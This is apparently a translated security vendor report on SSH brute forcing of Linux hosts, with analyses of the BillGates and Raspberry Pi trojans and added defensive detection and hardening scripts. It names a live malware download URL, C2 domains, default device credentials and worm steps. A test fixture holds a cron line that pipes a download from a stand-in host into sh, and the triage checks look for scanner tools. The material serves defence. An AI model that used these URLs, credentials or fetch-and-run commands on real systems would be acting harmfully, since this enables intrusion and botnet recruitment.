Overview
Linux, one of the five major operating systems, currently accounts for more than 80% of the server market. As cloud computing and the Internet of Things develop, with Linux the mainstream underlying operating system for IoT, the number of scenarios in which it is deployed will grow rapidly.
Through long-term monitoring of global Internet security data for all kinds of service ports, the Anheng Security Data Brain team found that more than 50 million Linux hosts worldwide expose their SSH port, with the largest numbers in the United States and China, and that these servers face heavy attack in the form of port scanning, password brute forcing ("blasting"), vulnerability scanning and so on. Every day a large volume of scanning traffic probes the SSH and database ports of systems across the whole network; once a probe finds an open service, brute forcing follows in order to obtain control of the host. Compromised Linux hosts are typically used for cryptocurrency mining and DDoS attacks, and to capture further "broilers" (bots) by spreading worms across the intranet. This seriously affects the security of cyberspace. It is recommended that subsequent network security awareness and governance work strengthen standardized security control of such systems and clean up zombie hosts promptly.
Main points of this paper:
- More than 50 million Linux hosts on the Internet expose their SSH port and suffer heavy port scanning and brute-force threats.
- Remote management ports and database ports are the ones attackers hit most often.
- Weak passwords and the default passwords of proprietary devices (accounts such as Cisco, Pi, db2as) remain attackers' first choice.
- Attacks on Linux systems originate mainly in Europe, the United States, South Korea and a few other regions, and the attacking systems are mostly Linux hosts themselves.
- After a Linux host is compromised it is mostly used for mining, launching DDoS attacks and spreading worms across the intranet to capture more broilers. The most common trojans are the BillGates Trojan and the Raspberry Pi Trojan.
Serious security risks facing the Linux system
The number of Linux servers exposed on the whole network is huge
Linux has always been widely deployed:
- As an enterprise server
It serves as the WWW server, database server, load balancer and DNS server in enterprise architectures; besides reducing operating costs it provides high stability and reliability.
- As an embedded system
From network devices (routers, switches, firewalls, load balancers) to specialized control systems (vending machines, mobile phones, PDAs, all kinds of household appliances), Linux has a broad market. In recent years it has become a mainstream embedded development platform and has entered industries such as telecommunications, finance and education. Major hardware manufacturers and large and very large Internet companies use Linux as the platform on which their server-side programs run.
In August 2018 the Anheng Security Data Brain team used the Sumap platform to survey devices with an open SSH port on the Internet. The survey found 51,689,792 exposed SSH ports worldwide, 11,964,730 of them in China.
The TOP10 regions by number of exposed SSH ports are as follows:
Figure 2-1 Distribution of exposed SSH ports
Figure 2-2 Distribution of exposed SSH ports
The three regions with the most exposed SSH ports are:
the United States with 14,448,205; China with 11,964,730; Germany with 2,710,689.
The United States and China have by far the largest number of open SSH ports. Each open SSH port exposes a Linux system directly to the Internet and greatly increases the risk it faces.
Most systems are subjected to high-frequency persistent attacks
The Security Data Brain team analyzed a large number of attacks on Linux systems and found that a single Linux system with exposed ports suffers on average more than 40,000 attacks per day. Attackers mostly mount high-frequency, persistent attacks, with attack runs averaging about five attempts per second.
A Linux system with a weak password is broken into about 17,000 times a month. After a successful login the attacker checks host information, disables the firewall, downloads files that connect back to the remote C2 host, and then mines or launches DDoS attacks.
An overview of mainstream attacks
Remote management and database ports are the main scanning targets
Port scanning is the most common method attackers use to discover whether a server has open ports or exploitable vulnerabilities; the server is then attacked through those vulnerabilities or by brute forcing.
Attackers in different countries scan for different ports. The following is an analysis of port scanning by country:
Figure 2-3 Port scanning distribution in different countries
* Note: ports 2222 and 2223 are commonly used for remote management of the system (alternative SSH ports); port 3306 is MySQL; ports 80 and 443 are the standard web server ports; port 25 is SMTP.
Table 2-1 Port scanning preferences of attackers by country
Generally speaking, the ports used for intrusion are concentrated on remote access and database services, which shows that the scanning preferences of most mainstream attackers are simple and crude. For operations and maintenance staff this means that strict day-to-day port management avoids most of the risk. Yet the exposure data show that some operations staff have little awareness of security management and leave those opportunities open.
Brute forcing of weak passwords and proprietary-device default passwords is a serious problem
Brute-force cracking is the most common and easiest attack to carry out. The Security Data Brain team observed the following distribution of user names and passwords used in brute-force attacks against Linux systems:
Figure 2-4 Common blasting user names
Among user names, the classic root, admin, shell, enable, default and similar accounts still dominate.
Figure 2-5 Common blasting passwords
Among passwords, default passwords and simple sequences such as system, user, 1234 and sh are the ones attackers try most.
Besides ordinary weak passwords, attackers also routinely try the default passwords of proprietary devices. The default accounts of common proprietary devices are as follows:
Table 2-2 Default accounts of dedicated devices
Comparing with Figure 2-4 (common brute-forced user names) shows that a large share of the brute-forced accounts are the default accounts of proprietary devices.
In summary, weak-password brute forcing is one of the most popular attack methods because it is cheap and has a high success rate. So do not trade security for convenience: make passwords and user names as complex as possible and rotate passwords periodically (for example every 30 days). Enterprises, whose data is worth more, should raise employees' awareness of password management. Probing of proprietary devices and IoT facilities has become a trend, and the security management of such non-server equipment cannot wait.
Regional characteristics of attack sources
Viewed by region, the scanning and probing attacks against Linux systems originate most densely in Europe, China, the United States and South Korea. The distribution of attack sources by country is as follows:
Figure 2-6 Global distribution of scanning and probing attack sources against Linux
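The brute-force pattern described in this section leaves a clear trace in sshd's log: many "Failed password" lines from one source, sometimes followed by an "Accepted password" for one of the guessed accounts. The following script is an added example, not code from the report or from Anheng, that pulls both signals out of an auth log with awk and prints the nftables commands that would block the offenders. The log lines (documentation-range addresses), the failure threshold and the `inet filter` table name are constructed assumptions for this example.

```sh
#!/bin/sh
# Constructed sshd log excerpt (invented for this example, documentation-range
# source addresses): one source guesses several of the user names named above
# before an "Accepted password" for the pi account.
SAMPLE_AUTH_LOG='Aug  1 14:17:31 host sshd[2101]: Failed password for root from 203.0.113.10 port 51022 ssh2
Aug  1 14:17:32 host sshd[2103]: Failed password for invalid user admin from 203.0.113.10 port 51023 ssh2
Aug  1 14:17:33 host sshd[2105]: Failed password for invalid user enable from 203.0.113.10 port 51024 ssh2
Aug  1 14:17:35 host sshd[2107]: Failed password for root from 203.0.113.10 port 51025 ssh2
Aug  1 14:17:36 host sshd[2109]: Failed password for pi from 203.0.113.10 port 51026 ssh2
Aug  1 14:17:37 host sshd[2111]: Accepted password for pi from 203.0.113.10 port 51027 ssh2
Aug  1 14:20:01 host sshd[2150]: Failed password for invalid user shell from 198.51.100.7 port 40001 ssh2
Aug  1 14:20:02 host sshd[2152]: Failed password for invalid user default from 198.51.100.7 port 40002 ssh2
Aug  1 15:00:00 host sshd[2200]: Accepted publickey for ops from 192.0.2.5 port 60000 ssh2'

# Arg 1: log text, arg 2: threshold. Prints "<failures> <ip>" for every source
# with at least <threshold> failed password attempts, most active first.
failed_logins_by_ip() {
  printf '%s\n' "$1" | awk -v min="$2" '
    /sshd\[[0-9]+\]: Failed password for/ {
      for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
    }
    END { for (ip in fails) if (fails[ip] >= min) printf "%d %s\n", fails[ip], ip }
  ' | sort -rn
}

# Arg 1: log text. Prints "<user> <ip>" for every accepted login whose source
# had already failed earlier in the same log: the signature of a guess that landed.
success_after_failures() {
  printf '%s\n' "$1" | awk '
    /sshd\[[0-9]+\]: Failed password for/ {
      for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
    }
    /sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
      for (i = 1; i <= NF; i++) {
        if ($i == "for") user = $(i + 1)
        if ($i == "from") ip = $(i + 1)
      }
      if (fails[ip] > 0) printf "%s %s\n", user, ip
    }
  '
}

# Arg 1: log text, arg 2: threshold. Prints (does not run) the nftables command
# that would drop further SSH traffic from each source over the threshold, so
# the example is safe to execute anywhere.
block_commands() {
  failed_logins_by_ip "$1" "$2" | while read -r count ip; do
    printf 'nft add rule inet filter input ip saddr %s tcp dport 22 drop\n' "$ip"
  done
}

echo "== sources with >= 3 failures =="; failed_logins_by_ip "$SAMPLE_AUTH_LOG" 3
echo "== successful login after failures =="; success_after_failures "$SAMPLE_AUTH_LOG"
echo "== proposed blocks =="; block_commands "$SAMPLE_AUTH_LOG" 3
```

On a real host feed `/var/log/auth.log` (or `journalctl -u ssh -o short`) to the functions instead of the sample; the second function is the one worth alerting on, because a login that follows a run of failures from the same address is exactly the "17,000 successful break-ins a month" the report counts.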
We track and analyze the systems used by attackers. The following figure shows the distribution of attacker systems:
Figure 2-7 System distribution of attackers
The inspection found that, among attacks from identifiable operating systems, Linux accounted for more than 60%, including some zombie hosts that had themselves been compromised and put to use.
Mining and DDoS attacks are the main purposes
By tracking and observing Internet attack traffic over a long period, the Security Data Brain team found that current attacks against Linux hosts mainly aim to capture broilers for mining and DDoS attacks. Two typical trojans are selected here for brief analysis: the BillGates Trojan and the Raspberry Pi Trojan.
BillGates Trojan analysis
Overview
The BillGates Trojan is a mainstream Trojan family on Linux, used mainly for DDoS attacks or mining. The following is an analysis of a recent BillGates attack.
The Anheng Security Data Brain team captured a DDoS trojan on a honeypot platform on July 30, 2018. The source IP was 61.178.179.93. The attacker brute-forced SSH, entered the honeypot's emulated file system and downloaded a trojan that turns the machine into a broiler capable of launching DDoS attacks.
The Trojan horse file is as follows:
Figure 3-1 A DDoS Trojan horse file
Analysis shows the attacker attempted the download three times and succeeded once.
Intrusion process
The attacker first brute-forces the exposed SSH service, usually on port 22, and enters the honeypot's emulated file system. Once inside, the attacker first disables the firewall, then fetches the trojan from port 45454 of the source IP 61.178.179.93 and starts the trojan program repeatedly.
Figure 3-2 Obtaining the Trojan horse from the source IP address and repeatedly starting the Trojan horse program
The Trojan download path is http://61.178.179.93:45454/Hoogp; at the time of analysis the path was still reachable and the file could still be downloaded:
Figure 3-3 Access and Download page of the Trojan Horse
The IP address 61.178.179.93 from which the trojan was downloaded is located in Gansu, China; it had launched attacks before and had been marked as a malware site by the Anheng Threat Intelligence Center.
Figure 3-4 Details about the Trojan horse
Analysis of the Hoogp sample confirmed it is malicious; several anti-virus engines also detect it as a backdoor and DDoS tool.
Figure 3-5 Detection results of multiple antivirus engines
Communication behavior
We further analyzed the file's communication behavior and found that the domains associated with it are xunyi-gov.cn and ddos.xunyi-gov.cn; xunyi-gov.cn has been marked as a BillGates botnet domain.
The domain has five subdomains: blog.xunyi-gov.cn, hack.xunyi-gov.cn, www.xunyi-gov.cn, ddos.xunyi-gov.cn and s.xunyi-gov.cn. Most of them are marked as remote-control or malware related.
Table 3-1 Association analysis of domain name xunyi-gov.cn
Figure 3-7 Communication samples of the Trojan horse
A reverse lookup on the other associated domain, ddos.xunyi-gov.cn, found that it too is still marked as malware-communication related:
Figure 3-8 Reverse domain name check
In addition, the association analysis below shows that the organization behind these domains controls its malicious domains in batches and has captured a large number of hosts, which suggests a hacker group of some scale.
Table 3-2 Association analysis of ddos.xunyi-gov.cn domain names
Raspberry Pi Trojan analysis
Overview
The Raspberry Pi, first released in 2012, is a credit-card-sized single-board computer that runs Linux.
On July 31, 2018, the Anheng Security Data Brain team found, in a honeypot emulating a Raspberry Pi system, the malicious files left behind by an attacker who broke in to mine cryptocurrency. Log analysis showed the attacking IP was 121.153.206.110, located in South Korea.
Intrusion process
The attacker logged into the honeypot on July 31, 2018 at 14:17:37 using the Raspberry Pi default account and its weak default password.
Figure 3-10 Attacker using a weak password to log in to the honeypot platform
Looking further at the commands the attacker executed shows that the attacker transferred a file named "E7wWc5ku" to /tmp with scp, changed into /tmp, made the file executable and ran it with bash.
Behavior analysis
We then retrieved and analyzed the complete shell script. It kills a batch of competing mining processes and other resource-hogging processes, then starts mining.
Killing competing mining programs and processes:
Figure 3-11 Analyzing the attacker process
A suspicious entry is then added to /etc/hosts, mapping bins.deutschland-zahlung.eu to the local (loopback) address. The script then unsets the shell variables it had set, changes the password of the pi user, generates an SSH key pair and writes the public key into the SSH authorized keys file, sets the DNS servers, and writes a file through a heredoc (delimiter EOF MARKER) containing a string of suspicious domain names that the analysis believes to be IRC servers.
Figure 3-12 Attacker process analysis (2)
The file written through the heredoc is then launched in the background, zmap and sshpass are downloaded, and zmap is used to scan the intranet so that the current machine can be used to spread further. The IP list produced by the scan is tried with the credentials pi:raspberry and pi:raspberryraspberry993311, and whenever a login succeeds the script uploads itself with scp.
Figure 3-13 Attacker process analysis (3)
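The two intrusions above leave similar artifacts on a compromised host: a payload re-fetched over HTTP from an IP:port in the BillGates case; a sinkhole entry in /etc/hosts, an executable in /tmp, an added SSH key, changed resolvers and a downloaded scanner in the Raspberry Pi case. The following triage script is an added example, not part of the report or of any Anheng tool: it checks for those traces and, so that it can be run anywhere, first builds a constructed fixture tree whose key comment, cron line and 203.0.113.5 download host are invented (only the hosts-file name bins.deutschland-zahlung.eu and the /tmp file name E7wWc5ku come from the analysis above). Pass an empty root to inspect the live host instead.

```sh
#!/bin/sh
# Post-compromise triage for the traces described in the BillGates and
# Raspberry Pi analyses. Every check takes a root directory so that it can be
# run against a fixture tree; use "" for the real filesystem.

# Build a constructed fixture resembling the compromised Raspberry Pi. The key
# comment, the cron line and the 203.0.113.5 host are invented for this example.
make_fixture() {
  fx=$(mktemp -d)
  mkdir -p "$fx/etc/cron.d" "$fx/tmp" "$fx/home/pi/.ssh" "$fx/usr/bin"
  printf '127.0.0.1 localhost\n127.0.1.1 raspberrypi\n127.0.0.1 bins.deutschland-zahlung.eu\n' > "$fx/etc/hosts"
  printf 'nameserver 8.8.8.8\n' > "$fx/etc/resolv.conf"
  printf 'ssh-rsa AAAAB3Nza...pi pi@raspberrypi\nssh-rsa AAAAB3Nza...xx attacker@unknown\n' > "$fx/home/pi/.ssh/authorized_keys"
  printf '* * * * * root curl -s http://203.0.113.5:45454/x | sh\n' > "$fx/etc/cron.d/update"
  : > "$fx/tmp/E7wWc5ku"; chmod 755 "$fx/tmp/E7wWc5ku"
  : > "$fx/usr/bin/zmap"; chmod 755 "$fx/usr/bin/zmap"
  printf '%s\n' "$fx"
}

# Arg 1: root of the tree to inspect ("" for the live host), arg 2: space
# separated list of resolvers that are expected. Prints one finding per line.
triage() {
  root=$1
  # 1. /etc/hosts lines that point a dotted public name at loopback: the
  #    script above does this to starve competing miners of their downloads.
  if [ -f "$root/etc/hosts" ]; then
    awk '$1 ~ /^127\./ && $2 ~ /\./ && $2 != "localhost.localdomain" { print "hosts-sinkhole", $2 }' "$root/etc/hosts"
  fi
  # 2. Executables in /tmp (the sample was scp'd there and chmod +x'd).
  find "$root/tmp" -type f -perm -100 2>/dev/null | sed "s|^$root||; s|^|tmp-executable |"
  # 3. Every authorized_keys entry; review any comment you do not recognise.
  for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
    if [ -f "$f" ]; then
      awk -v f="${f#$root}" 'NF >= 2 { print "authorized-key", f, ($3 == "" ? "(no comment)" : $3) }' "$f"
    fi
  done
  # 4. Scanning / lateral-movement tools the worm installs.
  for t in zmap sshpass masscan; do
    for d in "$root"/usr/bin "$root"/usr/local/bin "$root"/bin; do
      if [ -x "$d/$t" ]; then echo "scanner-installed $t"; fi
    done
  done
  # 5. Resolvers outside the expected set (the script rewrites DNS).
  if [ -f "$root/etc/resolv.conf" ]; then
    awk -v ok="$2" 'BEGIN { n = split(ok, a, " "); for (i = 1; i <= n; i++) good[a[i]] = 1 }
      $1 == "nameserver" && !($2 in good) { print "dns-changed", $2 }' "$root/etc/resolv.conf"
  fi
  # 6. Cron entries that pull something over HTTP, the way the BillGates
  #    dropper re-fetches and restarts its trojan.
  for c in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/var/spool/cron/*; do
    if [ -f "$c" ]; then
      grep -E 'https?://' "$c" | sed "s|^|cron-fetch ${c#$root} |"
    fi
  done
}

ROOT=$(make_fixture)
triage "$ROOT" "192.0.2.53"
rm -rf "$ROOT"
```

The script deliberately reports every authorized key rather than trying to decide which one is the attacker's: the Raspberry Pi script adds a key and changes the pi password, so any key the owner does not recognise on a box that also shows the other findings is the persistence to remove first.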
Security management is urgent
The analysis above of the mainstream threats facing Linux systems provides a reliable basis for their standardized management and governance.
Daily security operation and maintenance standards
Given how many remote-service and database ports are exposed on the Internet today and how heavily they are brute-forced, the management of server ports needs to be standardized. In daily operations, avoid opening unnecessary application ports, especially remote-service ports and database services, which are easy to discover and brute-force. Where a port must be opened, restrict network access to it so that attacks from unauthorized addresses are blocked. Standardized port management is easy to put into practice and the results are remarkable.
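One concrete form of the port management recommended here: audit what is listening on all interfaces, confine the remote-management ports to a management network and take the database ports off the Internet. The script below is an added example, not from the report. The ss-style listing, the management network 192.0.2.0/24, the database ports added to the report's own list of sensitive ports, the sshd_config fragment and the MaxAuthTries threshold are all assumptions made for the example. It only prints the ruleset, so it can be run safely on any host.

```sh
#!/bin/sh
# Constructed `ss -Hltn` style listing (State Recv-Q Send-Q Local Peer),
# invented for this example rather than captured from a real host.
SAMPLE_SS='LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 80 0.0.0.0:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
LISTEN 0 511 0.0.0.0:443 0.0.0.0:*
LISTEN 0 128 0.0.0.0:2222 0.0.0.0:*
LISTEN 0 128 10.0.0.5:5432 0.0.0.0:*'

# Ports the report singles out (22, 2222, 2223 for remote management, 3306 for
# MySQL) plus other common database ports added here as an assumption.
SENSITIVE_PORTS='22 2222 2223 3306 5432 6379 27017 1433'

# Arg 1: ss-style listing. Prints each sensitive port bound to every interface
# (0.0.0.0 or [::]), sorted and de-duplicated; services bound only to loopback
# or to a private address are not reported.
exposed_sensitive_ports() {
  printf '%s\n' "$1" | awk -v list="$SENSITIVE_PORTS" '
    BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) sens[a[i]] = 1 }
    $1 == "LISTEN" {
      addr = $4; sub(/:[0-9]+$/, "", addr)   # "0.0.0.0:22" -> "0.0.0.0"
      port = $4; sub(/^.*:/, "", port)        # "[::]:22"   -> "22"
      if ((addr == "0.0.0.0" || addr == "[::]") && (port in sens)) print port
    }' | sort -n | uniq
}

# Arg 1: listing, arg 2: management network in CIDR form (an assumed input).
# Emits an nftables ruleset in which the exposed remote-management ports accept
# connections only from that network, and exposed database ports are called
# out for re-binding instead of being opened.
nft_allowlist_rules() {
  mgmt=$2
  echo 'table inet filter {'
  echo '  chain input {'
  echo '    type filter hook input priority 0; policy drop;'
  echo '    ct state established,related accept'
  echo '    iif lo accept'
  exposed_sensitive_ports "$1" | while read -r port; do
    case $port in
      22|2222|2223) echo "    tcp dport $port ip saddr $mgmt accept" ;;
      *) echo "    # tcp dport $port is a database port: bind it to localhost or a private address instead of opening it" ;;
    esac
  done
  echo '    tcp dport { 80, 443 } accept'
  echo '  }'
  echo '}'
}

# Constructed sshd_config fragment with the settings that make the password
# brute forcing described earlier viable. Note that sshd defaults to
# PasswordAuthentication yes when the line is absent, so an absent line is
# not a pass; this check only grades the lines that are present.
SAMPLE_SSHD_CONFIG='Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6'

# Arg 1: sshd_config text. Prints "<directive> <current> <recommended>" for
# each risky setting found (thresholds are this example's choice).
sshd_config_findings() {
  printf '%s\n' "$1" | awk '
    tolower($1) == "permitrootlogin" && tolower($2) != "no"        { print $1, $2, "no" }
    tolower($1) == "passwordauthentication" && tolower($2) != "no" { print $1, $2, "no" }
    tolower($1) == "maxauthtries" && $2 + 0 > 3                     { print $1, $2, "3" }
  '
}

echo "== exposed sensitive ports =="; exposed_sensitive_ports "$SAMPLE_SS"
echo "== suggested ruleset =="; nft_allowlist_rules "$SAMPLE_SS" 192.0.2.0/24
echo "== sshd_config findings =="; sshd_config_findings "$SAMPLE_SSHD_CONFIG"
```

On a real host replace the sample with `ss -Hltn` output and `/etc/ssh/sshd_config`; moving SSH to 2222 or 2223 buys nothing, since the report shows those ports are scanned as routinely as 22, whereas the source-address restriction and key-only authentication remove the brute-force surface entirely.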
Security standards for IoT terminal devices
IoT terminal devices run Linux underneath, but compared with traditional server operations their development history is short and their management mechanisms immature, so the security of these systems is very weak and their configuration management chaotic; the default-password problem is especially prominent. The earlier incidents in which compromised cameras and other IoT terminal devices launched DDoS attacks that caused a large-scale Internet outage in the United States fully exposed how non-standard the development, configuration and management of these systems are. It is therefore urgent to promote standardized security management of IoT terminal devices and to make security testing of products mandatory.
Zombie host awareness and governance
A large number of zombie hosts already exist in today's networks. Because enterprise networks, IDC machine rooms and public and private clouds of all kinds lack a mechanism for detecting them, a compromised host can remain under attacker control for a long time without the owner knowing, which is exactly what lets attackers capture broilers, launch DDoS attacks, mine and spread across intranets at will. Applying new methods of zombie host detection, so as to find out whether any system in the network has been compromised, is therefore the most pressing security problem to solve.
By capturing threat intelligence from Internet traffic data and analyzing it together with intelligence shared at home and abroad, zombie hosts across the network can be recognized on a wide scale and the addresses of the compromised hosts under malicious control extracted. This can effectively help regional regulators and organizations find out whether zombie hosts exist inside their networks and clean them up, preventing the immeasurable losses of continued compromise.